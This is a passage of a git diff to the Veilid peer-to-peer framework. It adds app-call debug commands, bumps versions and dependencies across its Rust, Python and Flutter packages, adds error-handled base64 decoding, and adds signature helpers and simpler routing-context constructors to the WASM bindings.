|
||||
|
||||
Ok(out)
|
||||
}
|
||||
|
||||
async fn debug_app_reply(&self, args: String) -> VeilidAPIResult<String> {
|
||||
let netman = self.network_manager()?;
|
||||
let rpc = netman.rpc_processor();
|
||||
|
||||
let (call_id, data) = if args.starts_with("#") {
|
||||
let (arg, rest) = args[1..].split_once(' ').unwrap_or((&args, ""));
|
||||
let call_id =
|
||||
OperationId::new(u64::from_str_radix(arg, 16).map_err(VeilidAPIError::generic)?);
|
||||
let rest = rest.trim_start().to_owned();
|
||||
let data = get_debug_argument(&rest, "debug_app_reply", "data", get_data)?;
|
||||
(call_id, data)
|
||||
} else {
|
||||
let call_id = rpc
|
||||
.get_app_call_ids()
|
||||
.first()
|
||||
.cloned()
|
||||
.ok_or_else(|| VeilidAPIError::generic("no app calls waiting"))?;
|
||||
let data = get_debug_argument(&args, "debug_app_reply", "data", get_data)?;
|
||||
(call_id, data)
|
||||
};
|
||||
|
||||
let data_len = data.len();
|
||||
|
||||
// Send a AppCall Reply
|
||||
self.app_call_reply(call_id, data)
|
||||
.await
|
||||
.map_err(VeilidAPIError::internal)?;
|
||||
|
||||
Ok(format!("Replied with {} bytes", data_len))
|
||||
}
|
||||
|
||||
async fn debug_route_allocate(&self, args: Vec<String>) -> VeilidAPIResult<String> {
|
||||
// [ord|*ord] [rel] [<count>] [in|out] [avoid_node_id]
|
||||
|
||||
@ -1387,7 +1661,11 @@ attach
|
||||
detach
|
||||
restart network
|
||||
contact <node>[<modifiers>]
|
||||
resolve <destination>
|
||||
ping <destination>
|
||||
appmessage <destination> <data>
|
||||
appcall <destination> <data>
|
||||
appreply [#id] <data>
|
||||
relay <relay> [public|local]
|
||||
punish list
|
||||
route allocate [ord|*ord] [rel] [<count>] [in|out]
|
||||
@ -1465,6 +1743,14 @@ record list <local|remote>
|
||||
self.debug_relay(rest).await
|
||||
} else if arg == "ping" {
|
||||
self.debug_ping(rest).await
|
||||
} else if arg == "appmessage" {
|
||||
self.debug_app_message(rest).await
|
||||
} else if arg == "appcall" {
|
||||
self.debug_app_call(rest).await
|
||||
} else if arg == "appreply" {
|
||||
self.debug_app_reply(rest).await
|
||||
} else if arg == "resolve" {
|
||||
self.debug_resolve(rest).await
|
||||
} else if arg == "contact" {
|
||||
self.debug_contact(rest).await
|
||||
} else if arg == "nodeinfo" {
|
||||
|
@ -10,16 +10,14 @@ use super::*;
|
||||
pub struct DHTRecordDescriptor {
|
||||
/// DHT Key = Hash(ownerKeyKind) of: [ ownerKeyValue, schema ]
|
||||
#[schemars(with = "String")]
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(type = "string"))]
|
||||
key: TypedKey,
|
||||
/// The public key of the owner
|
||||
#[schemars(with = "String")]
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(type = "string"))]
|
||||
owner: PublicKey,
|
||||
/// If this key is being created: Some(the secret key of the owner)
|
||||
/// If this key is just being opened: None
|
||||
#[schemars(with = "Option<String>")]
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(optional, type = "string"))]
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(optional))]
|
||||
owner_secret: Option<SecretKey>,
|
||||
/// The schema in use associated with the key
|
||||
schema: DHTSchema,
|
||||
|
@ -6,7 +6,6 @@ use super::*;
|
||||
pub struct DHTSchemaSMPLMember {
|
||||
/// Member key
|
||||
#[schemars(with = "String")]
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(type = "string"))]
|
||||
pub m_key: PublicKey,
|
||||
/// Member subkey count
|
||||
pub m_cnt: u16,
|
||||
|
@ -15,7 +15,6 @@ pub struct ValueData {
|
||||
|
||||
/// The public identity key of the writer of the data
|
||||
#[schemars(with = "String")]
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(type = "string"))]
|
||||
writer: PublicKey,
|
||||
}
|
||||
from_impl_to_jsvalue!(ValueData);
|
||||
|
@ -4,7 +4,6 @@ use super::*;
|
||||
#[derive(
|
||||
Copy, Default, Clone, Hash, PartialOrd, Ord, PartialEq, Eq, Serialize, Deserialize, JsonSchema,
|
||||
)]
|
||||
#[cfg_attr(target_arch = "wasm32", derive(Tsify))]
|
||||
#[serde(try_from = "String")]
|
||||
#[serde(into = "String")]
|
||||
pub struct FourCC(pub [u8; 4]);
|
||||
|
@ -83,10 +83,8 @@ pub struct VeilidStateNetwork {
|
||||
#[cfg_attr(target_arch = "wasm32", derive(Tsify))]
|
||||
pub struct VeilidRouteChange {
|
||||
#[schemars(with = "Vec<String>")]
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(type = "string"))]
|
||||
pub dead_routes: Vec<RouteId>,
|
||||
#[schemars(with = "Vec<String>")]
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(type = "string"))]
|
||||
pub dead_remote_routes: Vec<RouteId>,
|
||||
}
|
||||
|
||||
@ -100,7 +98,6 @@ pub struct VeilidStateConfig {
|
||||
#[cfg_attr(target_arch = "wasm32", derive(Tsify))]
|
||||
pub struct VeilidValueChange {
|
||||
#[schemars(with = "String")]
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(type = "string"))]
|
||||
pub key: TypedKey,
|
||||
pub subkeys: Vec<ValueSubkey>,
|
||||
pub count: u32,
|
||||
|
@ -1,6 +1,6 @@
|
||||
# --- Bumpversion match - do not reorder
|
||||
name: veilid
|
||||
version: 0.2.1
|
||||
version: 0.2.3
|
||||
# ---
|
||||
description: Veilid Framework
|
||||
homepage: https://veilid.com
|
||||
|
@ -1,7 +1,7 @@
|
||||
[package]
|
||||
# --- Bumpversion match - do not reorder
|
||||
name = "veilid-flutter"
|
||||
version = "0.2.1"
|
||||
version = "0.2.3"
|
||||
# ---
|
||||
authors = ["Veilid Team <contact@veilid.com>"]
|
||||
license = "MPL-2.0"
|
||||
@ -38,7 +38,7 @@ parking_lot = "^0"
|
||||
backtrace = "^0"
|
||||
serde_json = "^1"
|
||||
serde = "^1"
|
||||
futures-util = { version = "^0", default_features = false, features = [
|
||||
futures-util = { version = "^0", default-features = false, features = [
|
||||
"alloc",
|
||||
] }
|
||||
cfg-if = "^1"
|
||||
@ -47,10 +47,10 @@ data-encoding = { version = "^2" }
|
||||
# Dependencies for native builds only
|
||||
# Linux, Windows, Mac, iOS, Android
|
||||
[target.'cfg(not(target_arch = "wasm32"))'.dependencies]
|
||||
tracing-opentelemetry = "0.18"
|
||||
opentelemetry = { version = "0.18" }
|
||||
opentelemetry-otlp = { version = "0.11" }
|
||||
opentelemetry-semantic-conventions = "0.10"
|
||||
tracing-opentelemetry = "0.21"
|
||||
opentelemetry = { version = "0.20" }
|
||||
opentelemetry-otlp = { version = "0.13" }
|
||||
opentelemetry-semantic-conventions = "0.12"
|
||||
async-std = { version = "^1", features = ["unstable"], optional = true }
|
||||
tokio = { version = "^1", features = ["full"], optional = true }
|
||||
tokio-stream = { version = "^0", features = ["net"], optional = true }
|
||||
|
@ -1,7 +1,7 @@
|
||||
[tool.poetry]
|
||||
# --- Bumpversion match - do not reorder
|
||||
name = "veilid"
|
||||
version = "0.2.1"
|
||||
version = "0.2.3"
|
||||
# ---
|
||||
description = ""
|
||||
authors = ["Veilid Team <contact@veilid.com>"]
|
||||
|
@ -1,7 +1,7 @@
|
||||
[package]
|
||||
# --- Bumpversion match - do not reorder
|
||||
name = "veilid-server"
|
||||
version = "0.2.1"
|
||||
version = "0.2.3"
|
||||
# ---
|
||||
description = "Veilid Server"
|
||||
authors = ["Veilid Team <contact@veilid.com>"]
|
||||
@ -39,11 +39,11 @@ veilid-core = { path = "../veilid-core", default-features = false }
|
||||
tracing = { version = "^0", features = ["log", "attributes"] }
|
||||
tracing-subscriber = { version = "^0", features = ["env-filter"] }
|
||||
tracing-appender = "^0"
|
||||
tracing-opentelemetry = "0.18"
|
||||
tracing-opentelemetry = "0.21"
|
||||
# Buggy: tracing-error = "^0"
|
||||
opentelemetry = { version = "0.18" }
|
||||
opentelemetry-otlp = { version = "0.11" }
|
||||
opentelemetry-semantic-conventions = "0.10"
|
||||
opentelemetry = { version = "0.20" }
|
||||
opentelemetry-otlp = { version = "0.13" }
|
||||
opentelemetry-semantic-conventions = "0.12"
|
||||
async-std = { version = "^1", features = ["unstable"], optional = true }
|
||||
tokio = { version = "^1", features = ["full", "tracing"], optional = true }
|
||||
console-subscriber = { version = "^0", optional = true }
|
||||
@ -53,7 +53,7 @@ async-tungstenite = { version = "^0", features = ["async-tls"] }
|
||||
color-eyre = { version = "^0", default-features = false }
|
||||
backtrace = "^0"
|
||||
clap = { version = "4", features = ["derive", "string", "wrap_help"] }
|
||||
directories = "^4"
|
||||
directories = "^5"
|
||||
parking_lot = "^0"
|
||||
config = { version = "^0", features = ["yaml"] }
|
||||
cfg-if = "^1"
|
||||
@ -61,7 +61,7 @@ serde = "^1"
|
||||
serde_derive = "^1"
|
||||
serde_yaml = "^0"
|
||||
json = "^0"
|
||||
futures-util = { version = "^0", default_features = false, features = [
|
||||
futures-util = { version = "^0", default-features = false, features = [
|
||||
"alloc",
|
||||
] }
|
||||
url = "^2"
|
||||
@ -69,10 +69,10 @@ ctrlc = "^3"
|
||||
lazy_static = "^1"
|
||||
bugsalot = { package = "veilid-bugsalot", version = "0.1.0" }
|
||||
flume = { version = "^0", features = ["async"] }
|
||||
rpassword = "^6"
|
||||
rpassword = "^7"
|
||||
hostname = "^0"
|
||||
stop-token = { version = "^0", default-features = false }
|
||||
sysinfo = { version = "^0.28.4", default-features = false }
|
||||
sysinfo = { version = "^0.29.10", default-features = false }
|
||||
wg = "0.3.2"
|
||||
|
||||
[target.'cfg(windows)'.dependencies]
|
||||
@ -89,4 +89,4 @@ nix = "^0"
|
||||
tracing-journald = "^0"
|
||||
|
||||
[dev-dependencies]
|
||||
serial_test = "^0"
|
||||
serial_test = "^2"
|
||||
|
@ -1,7 +1,7 @@
|
||||
[package]
|
||||
# --- Bumpversion match - do not reorder
|
||||
name = "veilid-tools"
|
||||
version = "0.2.1"
|
||||
version = "0.2.3"
|
||||
# ---
|
||||
description = "A collection of baseline tools for Rust development use by Veilid and Veilid-enabled Rust applications"
|
||||
authors = ["Veilid Team <contact@veilid.com>"]
|
||||
@ -40,8 +40,8 @@ log = { version = "0.4.20" }
|
||||
eyre = "0.6.8"
|
||||
static_assertions = "1.1.0"
|
||||
cfg-if = "1.0.0"
|
||||
thiserror = "1.0.47"
|
||||
futures-util = { version = "0.3.28", default_features = false, features = [
|
||||
thiserror = "1.0.48"
|
||||
futures-util = { version = "0.3.28", default-features = false, features = [
|
||||
"alloc",
|
||||
] }
|
||||
parking_lot = "0.12.1"
|
||||
@ -49,7 +49,7 @@ once_cell = "1.18.0"
|
||||
stop-token = { version = "0.7.0", default-features = false }
|
||||
rand = "0.8.5"
|
||||
rand_core = "0.6.4"
|
||||
backtrace = "0.3.68"
|
||||
backtrace = "0.3.69"
|
||||
fn_name = "0.1.0"
|
||||
range-set-blaze = "0.1.9"
|
||||
flume = { version = "0.11.0", features = ["async"] }
|
||||
@ -66,10 +66,10 @@ futures-util = { version = "0.3.28", default-features = false, features = [
|
||||
"std",
|
||||
"io",
|
||||
] }
|
||||
chrono = "0.4.26"
|
||||
chrono = "0.4.31"
|
||||
|
||||
libc = "0.2.147"
|
||||
nix = "0.26.2"
|
||||
libc = "0.2.148"
|
||||
nix = { version = "0.27.1", features = [ "user" ] }
|
||||
|
||||
# Dependencies for WASM builds only
|
||||
[target.'cfg(target_arch = "wasm32")'.dependencies]
|
||||
|
@ -1,7 +1,7 @@
|
||||
[package]
|
||||
# --- Bumpversion match - do not reorder
|
||||
name = "veilid-wasm"
|
||||
version = "0.2.1"
|
||||
version = "0.2.3"
|
||||
# ---
|
||||
authors = ["Veilid Team <contact@veilid.com>"]
|
||||
license = "MPL-2.0"
|
||||
@ -15,7 +15,7 @@ default = ["veilid-core/default-wasm"]
|
||||
crypto-test = ["veilid-core/crypto-test"]
|
||||
|
||||
[dependencies]
|
||||
veilid-core = { version = "0.2.0", path = "../veilid-core", default-features = false }
|
||||
veilid-core = { version = "0.2.3", path = "../veilid-core", default-features = false }
|
||||
|
||||
tracing = { version = "^0", features = ["log", "attributes"] }
|
||||
tracing-wasm = "^0"
|
||||
@ -35,7 +35,7 @@ futures-util = { version = "^0" }
|
||||
data-encoding = { version = "^2" }
|
||||
gloo-utils = { version = "^0", features = ["serde"] }
|
||||
tsify = { version = "0.4.5", features = ["js"] }
|
||||
serde-wasm-bindgen = "0.5.0"
|
||||
serde-wasm-bindgen = "0.6.0"
|
||||
|
||||
[dev-dependencies]
|
||||
wasm-bindgen-test = "^0"
|
||||
|
@ -66,10 +66,15 @@ fn take_veilid_api() -> Result<veilid_core::VeilidAPI, veilid_core::VeilidAPIErr
|
||||
}
|
||||
|
||||
// Marshalling helpers
|
||||
pub fn unmarshall(b64: String) -> Vec<u8> {
|
||||
pub fn unmarshall(b64: String) -> APIResult<Vec<u8>> {
|
||||
data_encoding::BASE64URL_NOPAD
|
||||
.decode(b64.as_bytes())
|
||||
.unwrap()
|
||||
.map_err(|e| {
|
||||
VeilidAPIError::generic(format!(
|
||||
"error decoding base64url string '{}' into bytes: {}",
|
||||
b64, e
|
||||
))
|
||||
})
|
||||
}
|
||||
|
||||
pub fn marshall(data: &Vec<u8>) -> String {
|
||||
@ -246,11 +251,6 @@ pub fn change_log_level(layer: String, log_level: String) {
|
||||
}
|
||||
}
|
||||
|
||||
#[wasm_bindgen(typescript_custom_section)]
|
||||
const IUPDATE_VEILID_FUNCTION: &'static str = r#"
|
||||
type UpdateVeilidFunction = (event: VeilidUpdate) => void;
|
||||
"#;
|
||||
|
||||
#[wasm_bindgen()]
|
||||
pub fn startup_veilid_core(update_callback_js: Function, json_config: String) -> Promise {
|
||||
let update_callback_js = SendWrapper::new(update_callback_js);
|
||||
|
@ -3,7 +3,16 @@ use super::*;
|
||||
|
||||
#[wasm_bindgen(typescript_custom_section)]
|
||||
const IUPDATE_VEILID_FUNCTION: &'static str = r#"
|
||||
type UpdateVeilidFunction = (event: VeilidUpdate) => void;
|
||||
export type UpdateVeilidFunction = (event: VeilidUpdate) => void;
|
||||
|
||||
// Type overrides for structs that always get serialized by serde.
|
||||
export type CryptoKey = string;
|
||||
export type Nonce = string;
|
||||
export type Signature = string;
|
||||
export type KeyPair = `${PublicKey}:${SecretKey}`;
|
||||
export type FourCC = "NONE" | "VLD0" | string;
|
||||
export type CryptoTyped<TCryptoKey extends string> = `${FourCC}:${TCryptoKey}`;
|
||||
export type CryptoTypedGroup<TCryptoKey extends string> = Array<CryptoTyped<TCryptoKey>>;
|
||||
"#;
|
||||
|
||||
#[wasm_bindgen]
|
||||
|
@ -1,12 +1,6 @@
|
||||
#![allow(non_snake_case)]
|
||||
use super::*;
|
||||
|
||||
#[wasm_bindgen]
|
||||
extern "C" {
|
||||
#[wasm_bindgen(typescript_type = "string[]")]
|
||||
pub type ValidCryptoKinds;
|
||||
}
|
||||
|
||||
#[wasm_bindgen(js_name = veilidCrypto)]
|
||||
pub struct VeilidCrypto {}
|
||||
|
||||
@ -99,12 +93,8 @@ impl VeilidCrypto {
|
||||
|
||||
pub fn hashPassword(kind: String, password: String, salt: String) -> APIResult<String> {
|
||||
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;
|
||||
let password: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(password.as_bytes())
|
||||
.unwrap();
|
||||
let salt: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(salt.as_bytes())
|
||||
.unwrap();
|
||||
let password = unmarshall(password)?;
|
||||
let salt = unmarshall(salt)?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let crypto = veilid_api.crypto()?;
|
||||
@ -125,9 +115,7 @@ impl VeilidCrypto {
|
||||
password_hash: String,
|
||||
) -> APIResult<bool> {
|
||||
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;
|
||||
let password: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(password.as_bytes())
|
||||
.unwrap();
|
||||
let password = unmarshall(password)?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let crypto = veilid_api.crypto()?;
|
||||
@ -144,12 +132,8 @@ impl VeilidCrypto {
|
||||
|
||||
pub fn deriveSharedSecret(kind: String, password: String, salt: String) -> APIResult<String> {
|
||||
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;
|
||||
let password: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(password.as_bytes())
|
||||
.unwrap();
|
||||
let salt: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(salt.as_bytes())
|
||||
.unwrap();
|
||||
let password = unmarshall(password)?;
|
||||
let salt = unmarshall(salt)?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let crypto = veilid_api.crypto()?;
|
||||
@ -196,7 +180,79 @@ impl VeilidCrypto {
|
||||
APIResult::Ok(out.to_string())
|
||||
}
|
||||
|
||||
pub fn generateKeyPair(kind: String) -> APIResult<KeyPair> {
|
||||
pub fn verifySignatures(
|
||||
node_ids: StringArray,
|
||||
data: String,
|
||||
signatures: StringArray,
|
||||
) -> VeilidAPIResult<StringArray> {
|
||||
let node_ids = into_unchecked_string_vec(node_ids);
|
||||
let node_ids: Vec<TypedKey> = node_ids
|
||||
.iter()
|
||||
.map(|k| {
|
||||
veilid_core::TypedKey::from_str(k).map_err(|e| {
|
||||
VeilidAPIError::invalid_argument(
|
||||
"verifySignatures()",
|
||||
format!("error decoding nodeid in node_ids[]: {}", e),
|
||||
k,
|
||||
)
|
||||
})
|
||||
})
|
||||
.collect::<APIResult<Vec<TypedKey>>>()?;
|
||||
|
||||
let data: Vec<u8> = unmarshall(data)?;
|
||||
|
||||
let typed_signatures = into_unchecked_string_vec(signatures);
|
||||
let typed_signatures: Vec<TypedSignature> = typed_signatures
|
||||
.iter()
|
||||
.map(|k| {
|
||||
TypedSignature::from_str(k).map_err(|e| {
|
||||
VeilidAPIError::invalid_argument(
|
||||
"verifySignatures()",
|
||||
format!("error decoding keypair in key_pairs[]: {}", e),
|
||||
k,
|
||||
)
|
||||
})
|
||||
})
|
||||
.collect::<APIResult<Vec<TypedSignature>>>()?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let crypto = veilid_api.crypto()?;
|
||||
let out = crypto.verify_signatures(&node_ids, &data, &typed_signatures)?;
|
||||
let out = out
|
||||
.iter()
|
||||
.map(|item| item.to_string())
|
||||
.collect::<Vec<String>>();
|
||||
let out = into_unchecked_string_array(out);
|
||||
APIResult::Ok(out)
|
||||
}
|
||||
|
||||
pub fn generateSignatures(data: String, key_pairs: StringArray) -> APIResult<StringArray> {
|
||||
let data = unmarshall(data)?;
|
||||
|
||||
let key_pairs = into_unchecked_string_vec(key_pairs);
|
||||
let key_pairs: Vec<TypedKeyPair> = key_pairs
|
||||
.iter()
|
||||
.map(|k| {
|
||||
veilid_core::TypedKeyPair::from_str(k).map_err(|e| {
|
||||
VeilidAPIError::invalid_argument(
|
||||
"generateSignatures()",
|
||||
format!("error decoding keypair in key_pairs[]: {}", e),
|
||||
k,
|
||||
)
|
||||
})
|
||||
})
|
||||
.collect::<APIResult<Vec<veilid_core::TypedKeyPair>>>()?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let crypto = veilid_api.crypto()?;
|
||||
let out = crypto.generate_signatures(&data, &key_pairs, |k, s| {
|
||||
veilid_core::TypedSignature::new(k.kind, s).to_string()
|
||||
})?;
|
||||
let out = into_unchecked_string_array(out);
|
||||
APIResult::Ok(out)
|
||||
}
|
||||
|
||||
pub fn generateKeyPair(kind: String) -> APIResult<String> {
|
||||
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
@ -209,15 +265,14 @@ impl VeilidCrypto {
|
||||
)
|
||||
})?;
|
||||
let out = crypto_system.generate_keypair();
|
||||
let out = out.encode();
|
||||
APIResult::Ok(out)
|
||||
}
|
||||
|
||||
pub fn generateHash(kind: String, data: String) -> APIResult<String> {
|
||||
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;
|
||||
|
||||
let data: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(data.as_bytes())
|
||||
.unwrap();
|
||||
let data = unmarshall(data)?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let crypto = veilid_api.crypto()?;
|
||||
@ -254,9 +309,7 @@ impl VeilidCrypto {
|
||||
pub fn validateHash(kind: String, data: String, hash: String) -> APIResult<bool> {
|
||||
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;
|
||||
|
||||
let data: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(data.as_bytes())
|
||||
.unwrap();
|
||||
let data = unmarshall(data)?;
|
||||
|
||||
let hash: veilid_core::HashDigest = veilid_core::HashDigest::from_str(&hash)?;
|
||||
|
||||
@ -298,9 +351,7 @@ impl VeilidCrypto {
|
||||
let key: veilid_core::PublicKey = veilid_core::PublicKey::from_str(&key)?;
|
||||
let secret: veilid_core::SecretKey = veilid_core::SecretKey::from_str(&secret)?;
|
||||
|
||||
let data: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(data.as_bytes())
|
||||
.unwrap();
|
||||
let data = unmarshall(data)?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let crypto = veilid_api.crypto()?;
|
||||
@ -315,9 +366,7 @@ impl VeilidCrypto {
|
||||
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;
|
||||
|
||||
let key: veilid_core::PublicKey = veilid_core::PublicKey::from_str(&key)?;
|
||||
let data: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(data.as_bytes())
|
||||
.unwrap();
|
||||
let data = unmarshall(data)?;
|
||||
let signature: veilid_core::Signature = veilid_core::Signature::from_str(&signature)?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
@ -354,20 +403,16 @@ impl VeilidCrypto {
|
||||
) -> APIResult<String> {
|
||||
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;
|
||||
|
||||
let body: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(body.as_bytes())
|
||||
.unwrap();
|
||||
let body = unmarshall(body)?;
|
||||
|
||||
let nonce: veilid_core::Nonce = veilid_core::Nonce::from_str(&nonce)?;
|
||||
|
||||
let shared_secret: veilid_core::SharedSecret =
|
||||
veilid_core::SharedSecret::from_str(&shared_secret)?;
|
||||
|
||||
let associated_data: Option<Vec<u8>> = associated_data.map(|ad| {
|
||||
data_encoding::BASE64URL_NOPAD
|
||||
.decode(ad.as_bytes())
|
||||
.unwrap()
|
||||
});
|
||||
let associated_data = associated_data
|
||||
.map(|ad| unmarshall(ad))
|
||||
.map_or(APIResult::Ok(None), |r| r.map(Some))?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let crypto = veilid_api.crypto()?;
|
||||
@ -400,20 +445,16 @@ impl VeilidCrypto {
|
||||
) -> APIResult<String> {
|
||||
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;
|
||||
|
||||
let body: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(body.as_bytes())
|
||||
.unwrap();
|
||||
let body = unmarshall(body)?;
|
||||
|
||||
let nonce: veilid_core::Nonce = veilid_core::Nonce::from_str(&nonce).unwrap();
|
||||
let nonce: veilid_core::Nonce = veilid_core::Nonce::from_str(&nonce)?;
|
||||
|
||||
let shared_secret: veilid_core::SharedSecret =
|
||||
veilid_core::SharedSecret::from_str(&shared_secret).unwrap();
|
||||
veilid_core::SharedSecret::from_str(&shared_secret)?;
|
||||
|
||||
let associated_data: Option<Vec<u8>> = associated_data.map(|ad| {
|
||||
data_encoding::BASE64URL_NOPAD
|
||||
.decode(ad.as_bytes())
|
||||
.unwrap()
|
||||
});
|
||||
let associated_data: Option<Vec<u8>> = associated_data
|
||||
.map(|ad| unmarshall(ad))
|
||||
.map_or(APIResult::Ok(None), |r| r.map(Some))?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let crypto = veilid_api.crypto()?;
|
||||
@ -445,14 +486,12 @@ impl VeilidCrypto {
|
||||
) -> APIResult<String> {
|
||||
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;
|
||||
|
||||
let mut body: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(body.as_bytes())
|
||||
.unwrap();
|
||||
let mut body = unmarshall(body)?;
|
||||
|
||||
let nonce: veilid_core::Nonce = veilid_core::Nonce::from_str(&nonce).unwrap();
|
||||
let nonce: veilid_core::Nonce = veilid_core::Nonce::from_str(&nonce)?;
|
||||
|
||||
let shared_secret: veilid_core::SharedSecret =
|
||||
veilid_core::SharedSecret::from_str(&shared_secret).unwrap();
|
||||
veilid_core::SharedSecret::from_str(&shared_secret)?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let crypto = veilid_api.crypto()?;
|
||||
|
@ -3,70 +3,23 @@ use super::*;
|
||||
|
||||
#[wasm_bindgen()]
|
||||
pub struct VeilidRoutingContext {
|
||||
inner_routing_context: Option<RoutingContext>,
|
||||
inner_routing_context: RoutingContext,
|
||||
}
|
||||
|
||||
#[wasm_bindgen()]
|
||||
impl VeilidRoutingContext {
|
||||
/// Don't use this constructor directly.
|
||||
/// Use one of the `VeilidRoutingContext.create___()` factory methods instead.
|
||||
/// @deprecated
|
||||
/// Create a new VeilidRoutingContext, without any privacy or sequencing settings.
|
||||
#[wasm_bindgen(constructor)]
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
inner_routing_context: None,
|
||||
}
|
||||
}
|
||||
|
||||
// --------------------------------
|
||||
// Constructor factories
|
||||
// --------------------------------
|
||||
|
||||
/// Get a new RoutingContext object to use to send messages over the Veilid network.
|
||||
pub fn createWithoutPrivacy() -> APIResult<VeilidRoutingContext> {
|
||||
pub fn new() -> APIResult<VeilidRoutingContext> {
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let routing_context = veilid_api.routing_context();
|
||||
Ok(VeilidRoutingContext {
|
||||
inner_routing_context: Some(routing_context),
|
||||
APIResult::Ok(VeilidRoutingContext {
|
||||
inner_routing_context: veilid_api.routing_context(),
|
||||
})
|
||||
}
|
||||
|
||||
/// Turn on sender privacy, enabling the use of safety routes.
|
||||
///
|
||||
/// Default values for hop count, stability and sequencing preferences are used.
|
||||
///
|
||||
/// Hop count default is dependent on config, but is set to 1 extra hop.
|
||||
/// Stability default is to choose 'low latency' routes, preferring them over long-term reliability.
|
||||
/// Sequencing default is to have no preference for ordered vs unordered message delivery
|
||||
/// To modify these defaults, use `VeilidRoutingContext.createWithCustomPrivacy()`.
|
||||
pub fn createWithPrivacy() -> APIResult<VeilidRoutingContext> {
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let routing_context = veilid_api.routing_context().with_privacy()?;
|
||||
Ok(VeilidRoutingContext {
|
||||
inner_routing_context: Some(routing_context),
|
||||
})
|
||||
}
|
||||
|
||||
/// Turn on privacy using a custom `SafetySelection`
|
||||
pub fn createWithCustomPrivacy(
|
||||
safety_selection: SafetySelection,
|
||||
) -> APIResult<VeilidRoutingContext> {
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let routing_context = veilid_api
|
||||
.routing_context()
|
||||
.with_custom_privacy(safety_selection)?;
|
||||
Ok(VeilidRoutingContext {
|
||||
inner_routing_context: Some(routing_context),
|
||||
})
|
||||
}
|
||||
|
||||
/// Use a specified `Sequencing` preference, with or without privacy.
|
||||
pub fn createWithSequencing(sequencing: Sequencing) -> APIResult<VeilidRoutingContext> {
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let routing_context = veilid_api.routing_context().with_sequencing(sequencing);
|
||||
Ok(VeilidRoutingContext {
|
||||
inner_routing_context: Some(routing_context),
|
||||
})
|
||||
/// Same as `new VeilidRoutingContext()` except easier to chain.
|
||||
pub fn create() -> APIResult<VeilidRoutingContext> {
|
||||
VeilidRoutingContext::new()
|
||||
}
|
||||
|
||||
// --------------------------------
|
||||
@ -87,6 +40,16 @@ impl VeilidRoutingContext {
|
||||
APIResult::Ok(route_blob)
|
||||
}
|
||||
|
||||
/// Import a private route blob as a remote private route.
|
||||
///
|
||||
/// Returns a route id that can be used to send private messages to the node creating this route.
|
||||
pub fn importRemotePrivateRoute(&self, blob: String) -> APIResult<RouteId> {
|
||||
let blob = unmarshall(blob)?;
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let route_id = veilid_api.import_remote_private_route(blob)?;
|
||||
APIResult::Ok(route_id)
|
||||
}
|
||||
|
||||
/// Allocate a new private route and specify a specific cryptosystem, stability and sequencing preference.
|
||||
/// Returns a route id and a publishable 'blob' with the route encrypted with each crypto kind.
|
||||
/// Those nodes importing the blob will have their choice of which crypto kind to use.
|
||||
@ -110,7 +73,7 @@ impl VeilidRoutingContext {
|
||||
///
|
||||
/// This will deactivate the route and free its resources and it can no longer be sent to or received from.
|
||||
pub fn releasePrivateRoute(route_id: String) -> APIResult<()> {
|
||||
let route_id: veilid_core::RouteId = veilid_core::deserialize_json(&route_id).unwrap();
|
||||
let route_id: veilid_core::RouteId = RouteId::from_str(&route_id)?;
|
||||
let veilid_api = get_veilid_api()?;
|
||||
veilid_api.release_private_route(route_id)?;
|
||||
APIRESULT_UNDEFINED
|
||||
@ -121,7 +84,7 @@ impl VeilidRoutingContext {
|
||||
